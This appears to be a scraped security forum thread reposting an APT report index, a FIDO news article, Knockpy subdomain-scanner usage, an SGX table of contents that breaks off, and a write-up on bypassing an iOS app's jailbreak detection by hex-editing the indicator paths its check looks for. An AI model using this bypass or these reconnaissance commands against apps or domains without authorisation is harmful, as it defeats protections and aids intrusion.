    Various public documents, whitepapers and articles about APT campaigns APT Notes This is a repository for various publicly-available documents and notes related to APT, sorted by year. For malware sample hashes, please see the individual reports Contributing For the moment, it would be nice to have a PDF of the article that we add to the list, just to be sure we always have a copy. To contribute, you can either: Fork, add and send me a pull request Open a ticket with the data you want to be added Adding data: Add a link to the public document to README.md page Add the PDF file to the appropriate year Thanks to the contributors for helping with the project! Papers The papers section contains historical documents. 2006 "Wicked Rose" and the NCPH Hacking Group 2008 Aug 10 - Russian Invasion of Georgia Russian Cyberwar on Georgia Oct 02 - How China will use cyber warfare to leapfrog in military competitiveness Nov 04 - China's Electronic Long-Range Reconnaissance Nov 19 - Agent.BTZ 2009 Jan 18 - Impact of Alleged Russian Cyber Attacks Mar 29 - Tracking GhostNet 2010 Jan 12 - Operation Aurora Jan 13 - The Command Structure of the Aurora Botnet - Damballa Jan 20 - McAfee Labs: Combating Aurora Jan 27 - Operation Aurora Detect, Diagnose, Respond Jan ?? - Case Study: Operation Aurora - Triumfant Feb 24 - How Can I Tell if I Was Infected By Aurora? (IOCs) Mar 14 - In-depth Analysis of Hydraq Apr 06 - Shadows in the cloud: Investigating Cyber Espionage 2.0 Sep 03 - The "MSUpdater" Trojan And Ongoing Targeted Attacks Sep 30 - W32.Stuxnet Dossier Dec 09 - The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability 2011 Feb 10 - Global Energy Cyberattacks: Night Dragon Feb 18 - Night Dragon Specific Protection Measures for Consideration Apr 20 - Stuxnet Under the Microscope Aug ?? - Shady RAT Aug 04 - Operation Shady RAT Aug 02 - Operation Shady rat : Vanity Aug 03 - HTran and the Advanced Persistent Threat Sep 09 - The RSA Hack Sep 11 - SK Hack by an Advanced Persistent Threat Sep 22 - The "LURID" Downloader Oct 12 - Alleged APT Intrusion Set: "1.php" Group Oct 26 - Duqu Trojan Questions and Answers Oct 31 - The Nitro Attacks: Stealing Secrets from the Chemical Industry Dec 08 - Palebot trojan harvests Palestinian online credentials 2012 Jan 03 - The HeartBeat APT Feb 03 - Command and Control in the Fifth Domain Feb 29 - The Sin Digoo Affair Mar 12 - Crouching Tiger, Hidden Dragon, Stolen Data Mar 13 - Reversing DarkComet RAT's crypto Mar 26 - Luckycat Redux Apr 10 - Anatomy of a Gh0st RAT Apr 16 - OSX.SabPub & Confirmed Mac APT attacks May 18 - Analysis of Flamer C&C Server May 22 - IXESHEA An APT Campaign May 31 - sKyWIper (Flame/Flamer) Jul 10 - Advanced Social Engineering for the Distribution of LURK Malware Jul 11 - Wired article on DarkComet creator Jul 27 - The Madi Campaign Aug 09 - Gauss: Abnormal Distribution Sep 06 - The Elderwood Project Sep 07 - IEXPLORE RAT Sep 12 - The VOHO Campaign: An in depth analysis Sep 18 - The Mirage Campaign Oct 08 - Matasano notes on DarkComet, Bandook, CyberGate and Xtreme RAT Oct 27 - Trojan.Taidoor: Targeting Think Tanks Nov 01 - RECOVERING FROM SHAMOON Nov 03 - Systematic cyber attacks against Israeli and Palestinian targets going on for a year 2013 Jan 14 - The Red October Campaign Jan 14 - Red October Diplomatic Cyber Attacks Investigation Jan 18 - Operation Red October Feb 12 - Targeted cyber attacks: examples and challenges ahead Feb 18 - Mandiant APT1 Report Feb 22 - Comment Crew: Indicators of Compromise Feb 26 - Stuxnet 0.5: The Missing Link Feb 27 - The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor Feb 27 - Miniduke: Indicators v1 Mar 13 - You Only Click Twice: FinFisher’s Global Proliferation Mar 17 - Safe: A Targeted Threat Mar 20 - Dissecting Operation Troy Mar 20 - The TeamSpy Crew Attacks Mar 21 - Darkseoul/Jokra Analysis And Recovery Mar 27 - APT1: technical backstage (Terminator/Fakem RAT) Mar 28 - TR-12 - Analysis of a PlugX malware variant used for targeted attacks Apr 01 - Trojan.APT.BaneChant Apr 13 - "Winnti" More than just a game Apr 24 - Operation Hangover May ?? - Operation Hangover May 30 - TR-14 - Analysis of a stage 3 Miniduke malware sample Jun ?? - The Chinese Malware Complexes: The Maudi Surveillance Operation Jun 01 - Crude Faux: An analysis of cyber conflict within the oil & gas industries Jun 04 - The NetTraveller (aka 'Travnet') Jun 07 - KeyBoy, Targeted Attacks against Vietnam and India Jun 18 - Trojan.APT.Seinup Hitting ASEAN Jun 21 - A Call to Harm: New Malware Attacks Target the Syrian Opposition Jun 28 - njRAT Uncovered Jul 09 - Dark Seoul Cyber Attack: Could it be worse? Jul 15 - PlugX revisited: "Smoaler" Jul 31 - Secrets of the Comfoo Masters Jul 31 - Blackhat: In-Depth Analysis of Escalated APT Attacks (Lstudio,Elirks), Aug ?? - Operation Hangover - Unveiling an Indian Cyberattack Infrastructure Aug ?? - APT Attacks on Indian Cyber Space Aug 02 - Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up Aug 02 - Surtr: Malware Family Targeting the Tibetan Community Aug 19 - ByeBye Shell and the targeting of Pakistan Aug 21 - POISON IVY: Assessing Damage and Extracting Intelligence Aug 23 - Operation Molerats: Middle East Cyber Attacks Using Poison Ivy Sep ?? - Feature: EvilGrab Campaign Targets Diplomatic Agencies Sep 11 - The "Kimsuky" Operation Sep 13 - Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets Sep 17 - Hidden Lynx - Professional Hackers for Hire Sep 25 - The 'ICEFROG' APT: A Tale of cloak and three daggers Sep 30 - World War C: State of affairs in the APT world Oct 24 - Terminator RAT or FakeM RAT Nov 10 - Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method Nov 11 - Supply Chain Analysis Dev 02 - njRAT, The Saga Continues Dec 11 - Operation "Ke3chang" Dec 20 - ETSO APT Attacks Analysis ??? ?? - Deep Panda ??? ?? - Detecting and Defeating the China Chopper Web Shell 2014 Jan 06 - PlugX: some uncovered points Jan 13 - Targeted attacks against the Energy Sector Jan 14 - The Icefog APT Hits US Targets With Java Backdoor Jan 15 - “New'CDTO:'A'Sneakernet'Trojan'Solution Jan 21 - Shell_Crew (Deep Panda) Jan 31 - Intruder File Report- Sneakernet Trojan Feb 11 - Unveiling "Careto" - The Masked APT Feb 13 - Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website Feb 19 - The Monju Incident Feb 19 - XtremeRAT: Nuisance or Threat? Feb 20 - Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit Feb 20 - Mo' Shells Mo' Problems - Deep Panda Web Shells Feb 23 - Gathering in the Middle East, Operation STTEAM Feb 28 - Uroburos: Highly complex espionage software with Russian roots Mar 06 - The Siesta Campaign Mar 07 - Snake Campaign & Cyber Espionage Toolkit Mar 08 - Russian spyware Turla Apr 26 - CVE-2014-1776: Operation Clandestine Fox May 13 - Operation Saffron Rose (aka Flying Kitten) May 13 - CrowdStrike's report on Flying Kitten May 20 - Miniduke Twitter C&C May 21 - RAT in jar: A phishing campaign using Unrecom Jun 06 - Illuminating The Etumbot APT Backdoor (APT12) Jun 09 - Putter Panda Jun 20 - Embassy of Greece Beijing Jun 30 - Dragonfly: Cyberespionage Attacks Against Energy Suppliers Jun 10 - Anatomy of the Attack: Zombie Zero Jul 07 - Deep Pandas Jul 10 - TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos Jul 11 - Pitty Tiger Jul 20 - Sayad (Flying Kitten) Analysis & IOCs Jul 31 - Energetic Bear/Crouching Yeti Jul 31 - Energetic Bear/Crouching Yeti Appendix Aug 04 - Sidewinder Targeted Attack Against Android Aug 05 - Operation Arachnophobia Aug 06 - Operation Poisoned Hurricane Aug 07 - The Epic Turla Operation Appendix Aug 12 - New York Times Attackers Evolve Quickly (Aumlib/Ixeshe/APT12) Aug 13 - A Look at Targeted Attacks Through the Lense of an NGO Aug 18 - The Syrian Malware House of Cards Aug 20 - El Machete Aug 25 - Vietnam APT Campaign Aug 27 - NetTraveler APT Gets a Makeover for 10th Birthday Aug 27 - North Korea’s cyber threat landscape Aug 28 - Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks Aug 29 - Syrian Malware Team Uses BlackWorm for Attacks Sep 03 - Darwin’s Favorite APT Group (APT12) Sep 04 - Forced to Adapt: XSLCmd Backdoor Now on OS X Sep 08 - Targeted Threat Index: Characterizingand Quantifying Politically-MotivatedTargeted Malware video Sep 08 - When Governments Hack Opponents: A Look at Actors and Technology video Sep 10 - Operation Quantum Entanglement Sep 17 - Chinese intrusions into key defense contractors Sep 18 - COSMICDUKE: Cosmu with a twist of MiniDuke Sep 19 - Watering Hole Attacks using Poison Ivy by "th3bug" group Sep 23 - Sep 26 - Aided Frame, Aided Direction (Sunshop Digital Quartermaster) Sep 26 - BlackEnergy & Quedagh Oct 03 - New indicators for APT group Nitro Oct 09 - Democracy in Hong Kong Under Attack Oct 14 - ZoxPNG Preliminary Analysis Oct 14 - Hikit Preliminary Analysis Oct 14 - Derusbi Preliminary Analysis Oct 14 - Group 72 (Axiom) Oct 14 - Sandworm - CVE-2104-4114 Oct 20 - OrcaRAT - A whale of a tale Oct 22 - Operation Pawn Storm: The Red in SEDNIT Oct 22 - Sofacy Phishing by PWC Oct 23 - Modified Tor Binaries Oct 24 - LeoUncia and OrcaRat Oct 27 - Full Disclosure of Havex Trojans - ICS Havex backdoors Oct 27 - ScanBox framework – who’s affected, and who’s using it? Oct 28 - APT28 - A Window Into Russia's Cyber Espionage Operations Oct 28 - Group 72, Opening the ZxShell Oct 30 - The Rotten Tomato Campaign Oct 31 - Operation TooHash Nov 03 - New observations on BlackEnergy2 APT activity Nov 03 - Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement Nov 10 - The Darkhotel APT - A Story of Unusual Hospitality Nov 11 - The Uroburos case- Agent.BTZ’s successor, ComRAT Nov 12 - Korplug military targeted attacks: Afghanistan & Tajikistan Nov 13 - Operation CloudyOmega: Ichitaro 0-day targeting Japan Nov 14 - OnionDuke: APT Attacks Via the Tor Network Nov 14 - Roaming Tiger (Slides) Nov 21 - Operation Double Tap | IOCs Nov 23 - Symantec's report on Regin Nov 24 - Kaspersky's report on The Regin Platform Nov 24 - TheIntercept's report on The Regin Platform Nov 24 - Deep Panda Uses Sakula Malware Nov 30 - FIN4: Stealing Insider Information for an Advantage in Stock Trading? Dec 02 - Operation Cleaver | IOCs Dec 03 - Operation Cleaver: The Notepad Files Dec 08 - The 'Penquin' Turla Dec 09 - The Inception Framework Dec 10 - Cloud Atlas: RedOctober APT Dec 10 - W32/Regin, Stage #1 Dec 10 - W64/Regin, Stage #1 Dec 10 - South Korea MBR Wiper Dec 12 - Vinself now with steganography Dec 12 - Bots, Machines, and the Matrix Dec 17 - Wiper Malware – A Detection Deep Dive Dec 18 - Malware Attack Targeting Syrian ISIS Critics Dec 19 - TA14-353A: Targeted Destructive Malware (wiper) Dec 21 - Operation Poisoned Helmand Dec 22 - Anunak: APT against financial institutions 2015 Jan 11 - Hong Kong SWC attack Jan 12 - Skeleton Key Malware Analysis Jan 15 - Evolution of Agent.BTZ to ComRAT Jan 20 - Analysis of Project Cobra Jan 20 - Reversing the Inception APT malware Jan 22 - The Waterbug attack group Jan 22 - Scarab attackers Russian targets | IOCs Jan 22 - Regin's Hopscotch and Legspin Jan 27 - Comparing the Regin module 50251 and the "Qwerty" keylogger Jan 29 - Backdoor.Winnti attackers and Trojan.Skelky Jan 29 - Analysis of PlugX Variant - P2P PlugX Feb 02 - Behind the Syrian Conflict’s Digital Frontlines Feb 04 - Pawn Storm Update: iOS Espionage App Found Feb 10 - CrowdStrike Global Threat Intel Report for 2014 Feb 16 - Equation: The Death Star of Malware Galaxy Feb 16 - The Carbanak APT Feb 16 - Operation Arid Viper Feb 17 - Desert Falcons APT Sursa: https://github.com/kbandla/APTnotes
      • 1
      • Upvote
  17. Nytro
    a trivial iOS jailbreak detection bypass introduction Not too long ago, I toyed with a Android root detection bypass. In a similar scenario, I was poking at a iOS application that also had some root detection built in. For very much the same purpose, I suppose the application has its own ~reasons~ for the jailbreak detection. Of course, this makes the testing I actually wanted to do impossible as I’d very much like to dig under the hood So, its was time to try and bypass the jailbreak detection of the application. All I had to work with was a .ipa. Similar to the android .apk file, the .ipa is also just a zipped up archive of the actual application files. To test with, I had a iPad mini. The iPad was running the latest iOS (8.1.2 at the time of this post) and was also jailbroken. If I remember correctly the jailbreak tool used was called TaiG. Anyways, inside the applications .ipa archive was a whole bunch of resource files and what not, including the compiled application executable. This executable is what is of interest. understanding the behavior I installed the app onto my iPad, and started to inspect its behavior. When the application starts, it would immediately throw a security related error, notifying the user that it has detected the environment as one that is jailbroken. This happens pretty fast too. Once the jailbreak detection error shows, the application refuses to continue to run. Restarting the application simply continues this loop. I studied some iOS jailbreak detection methods online which revealed many of them as being pretty obvious. From detecting the presence of /bin/bash or Cydia.app, to examining the exit status if fork(). There are some more advanced methods as well such as checking the existence of certain known dylib’s too (which apparently is the hardest to circumvent). For the purpose of this post, the jailbreak detection was pretty weak and did not have any of the more advanced methods implemented. In fact, I am pretty sure there won’t be that many apps out there that will be this easy to bypass. discovering the implementation Armed with some knowledge of how its typically done in the iOS world, I proceeded to take a look at the actual application binary: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]leonjza@laptop » file myApplication myApplication: Mach-O executable arm[/TD] [/TR] [/TABLE] Compiled as a Mach-O executable from Objective-C, I loaded up the binary from the extracted .ipa into the Hopper disassembler to help me get an idea of what is happening. Hopper has some nice features such as generating pseudo code etc, so I quite like using it for these types of excursions. To start off, I searched around for strings that were related to the word jailbreak within the app. Class definitions, methods or any strings related to the term jailbreak was ok. I just wanted to get something to start off with. I found nothing. Of course this had me thinking that I may have missed the plot entirely. I continued to search for other things related to jailbreaking, and got a hit immediately for the term /bin/bash in the string section: In fact, there are quite a few other jailbreak related strings in this section. From within Hopper, one can check where these strings are referenced from. So, I followed this and landed up in a function that does what I would have expected a jailbreak detection function to do, but with a completely unexpected class/method name. –[MobileDisplay isRetinaDisplay]:. Very sneaky So we are working with the isRetinaDisplay method which is the one doing the jailbreak detection: As can be seen in the above screenshot, the fileExistsAtPath for /Applications/Cydia.app is hardly something I would have expected in a isRetinaDisplay implementation planning an attack At this stage, I was fairly certain that I had found the code I was looking for. From the method name isRetinaDisplay, I reasoned a little and guessed that this was actually supposed to say isJailBroken. I want this method to return false. My mind went straight to getting cycript ready for some method swizzling. I started to set things up and played around a little, when I realized that I don’t think I will be able to manipulate the runtime fast enough for this to work. Remember, the first thing the app does is check the jailbreak status. A bit of thinking, a few coffees, special alone time with Google and lots of reading, I come to realize that even if I was able to get this method swizzling to work, I’d have to do this every time the application starts up. This was not going to work for me. It was time to rethink my strategy. Considering how the jailbreak detection works, most of the ways that I saw in the application were related to file existence checks. There was also an attempt to write to /private/jailbreak.txt, as well as open a cydia:// url. I realized that I could probably just change these strings to things that will inherently fail and cause the method to not return true for any of the checks. in 1992 we had hex editors too I ssh’d into my iPad and located the applications installed directory. Once I had found this, I scp’d the compiled binary to my kali linux install, and opened it in a hex editor. I realized later I could have probably just used the binary I already had locally Referencing the disassembly of isRetinaDisplay, I searched for the strings it used using a Hex editor. Each string I would replace a few characters with 0 ensuring that I keep the original string length intact. For eg: /bin/bash was replaced with /bin/ba00. I ended up editing the following strings using the hex editor: /Applications/Cydia.app –> /Applications/Cyd00.app /Library/MobileSubstrate/MobileSubstrate.dylib –> /Library/MobileSubstrate/MobileSubstra00.dylib /bin/bash –> /bin/ba00 /usr/sbin/sshd –> /usr/sbin/ss00 /etc/apt –> /etc/a00 /private/jailbreak.txt –> /0000000/0000000000000 cydia://package/com.example.package –> cyd00://package/com.example.package I saved the modifications that I had done, and scp’d the binary back to my iPad to the folder where it was installed. I literally just overwrote the existing binary. At this stage I figured I will most certainly have some form of signing related problem as the binary has been tampered with. Well, this was not the case. Instead, I no longer was greeted with the lame jailbreak security error summary In the end, it was pretty easy to find the jailbreak detection code. Deducing a few things based on the disassembly made it easy to find the method responsible for the checks, regardless of the attempt to hide it via a name change. Furthermore, using something as simple as a hex editor, a trivial implementation such as this was very easily bypassed Posted by Leon Jacobs Feb 20th, 2015 bypass, hex, ios, jailbreak Sursa: https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/
  18. Nytro
    Windows 10 embraces password-killing biometric authentication Ian Paul @ianpaul Ian is an independent writer based in Tel Aviv, Israel. His current focus is on all things tech including mobile devices, desktop and laptop computers, software, social networks, Web apps, tech-related legislation and corporate tech news. Microsoft is about to officially join the fight for authentication without pesky passwords. The company recently announced that Windows 10 will support the Fast Identity Online (FIDO) 2.0 specification. The end result is that instead of using passwords to log in to PCs, Microsoft services, and other third-party accounts, you’ll also be able to use a fingerprint or eye scan—possibly integrated with a key fob for two-factor authentication. In its blog post announcing FIDO in Windows 10, Microsoft focused largely on features that would interest IT types, such as FIDO support for major enterprise-focused cloud services including Office 365 Exchange Online, Salesforce, Citrix, and Box. But FIDO in Windows 10 will also work with consumer services such as Windows 10 sign-ins, Outlook.com, and OneDrive. Why this matters: The call to kill passwords with a better authentication solution have been ongoing for some time. FIDO appears to be the best chance for a one-size fits all solution to password-less authentication. The FIDO Alliance includes many major tech companies and other businesses with a big interest in security, including Arm, Bank of America, Google, Lenovo, Mastercard, PayPal, and Visa. Microsoft joined the FIDO Alliance in late 2013. When heavy hitters work together on problems like this the end result tends to be a near-universal solution—an absolute must if FIDO is to truly replace the password. What is FIDO? The idea behind FIDO isn’t all that new. Instead of using passwords—that can be forgotten, lost, stolen, or even guessed—a FIDO-equipped device would use biometrics such as fingerprint and eye scans that are much harder to acquire. This initial login method could also be paired with a key fob for two-factor authentication for added security. Biometric scanners have already been integrated into smartphones, laptops, and other devices for years. The difference with FIDO is that it’s an open standard, meaning any company can implement it into their products or services. It also means that FIDO-compliant biometric scanners and two-factor authentication devices can be used with any FIDO-supporting service, as opposed to the hodgepodge of fingerprint scanning security mechanisms we have now. The FIDO specifications are also designed so that a user’s biometric data never leaves the device. For anyone that wants to check it out, Microsoft says FIDO integration is already available in the Windows 10 Technical Preview for enterprise applications as well as Windows 10 sign-in. Sursa: Windows 10 embraces password-killing biometric authentication | PCWorld
  19. Nytro
    Knock Subdomain Scan v.3.0rc1 Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. Usage knockpy [-h] [-v] [-w WORDLIST] [-r] [-z] domain positional arguments: domain specific target domain, like domain.com optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -w WORDLIST specific path to wordlist file -r, --resolve resolve ip or domain name -z, --zone check for zone transfer note: the ALIAS name is marked in yellow. Example subdomain scan with internal wordlist knockpy domain.com subdomain scan with external wordlist knockpy domain.com -w wordlist.txt resolve domain name and get response headers knockpy -r domain.com check zone transfer for domain name knockpy -z domain.com Install from pypi (as root) pip install https://github.com/guelfoweb/knock/archive/knock3.zip or manually, download zip and extract folder cd knock-knock3/ (as root) python setup.py install note: tested with python 2.7.6 | is recommended to use google dns (8.8.8.8 | 8.8.4.4) Talk about Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch Other This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome. Sponsored by Security Side Sursa: https://github.com/guelfoweb/knock/tree/knock3
  20. Nytro
    Software Guard Extensions CHAPTER 1 INTRODUCTION TO SOFTWARE GUARD EXTENSIONS 1.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-1 1.2 Enclave Interaction and Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-1 1.3 Enclave Life Cycle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.4 Data Structures and Enclave Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.5 Enclave Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.5.1 Enclave Page Cache Map (EPCM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-3 1.6 Enclave Instructions and SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-3 1.7 Discovering Support for SGX and enabling Enclave Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-4 1.7.1 SGX Opt-In Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 1.7.2 System Software Enabling of SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 1.7.3 SGX Resource Enumeration Leaves. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 CHAPTER 2 ENCLAVE ACCESS CONTROL AND DATA STRUCTURES 2.1 Overview of Enclave Execution Environment. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.2 Terminology. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.3 Access-control Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.4 Segment-based Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2 2.5 Page-based Access Control. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2 2.5.1 Access-control for Accesses that Originate from non-SGX Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.2 Memory Accesses that Split across ELRANGE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3 Implicit vs. Explicit Accesses. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3.1 Explicit Accesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3.2 Implicit Accesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-3 2.6 SGX Data Structures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4 2.6.1 SGX Enclave Control Structure (SECS). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-4 2.6.1.1 ATTRIBUTES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-4 2.6.2 Thread Control Structure (TCS). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.1 TCS.FLAGS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.2 State Save Area Offset (OSSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.3 Number of State Save Areas (NSSA). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.4 Current State Save Area (CSSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.3 State Save Area (SSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.1 EXITINFO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.2 VECTOR Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.4 Page Information (PAGEINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5 Security Information (SECINFO). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5.1 SECINFO.FLAGS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.5.2 PAGE_TYPE Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.6 Paging Crypto MetaData (PCMD). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.7 Enclave Signature Structure (SIGSTRUCT). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-9 2.6.8 EINIT Token Structure (EINITTOKEN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9 Report (REPORT) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9.1 REPORTDATA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.10 Report Target Info (TARGETINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11 Key Request (KEYREQUEST) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.1 KEY REQUEST KeyNames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.2 Key Request Policy Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.12 Version Array (VA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.13 Enclave Page Cache Map (EPCM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 CHAPTER 3 ENCLAVE OPERATION 3.1 Constructing an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-1 3.1.1 EADD and 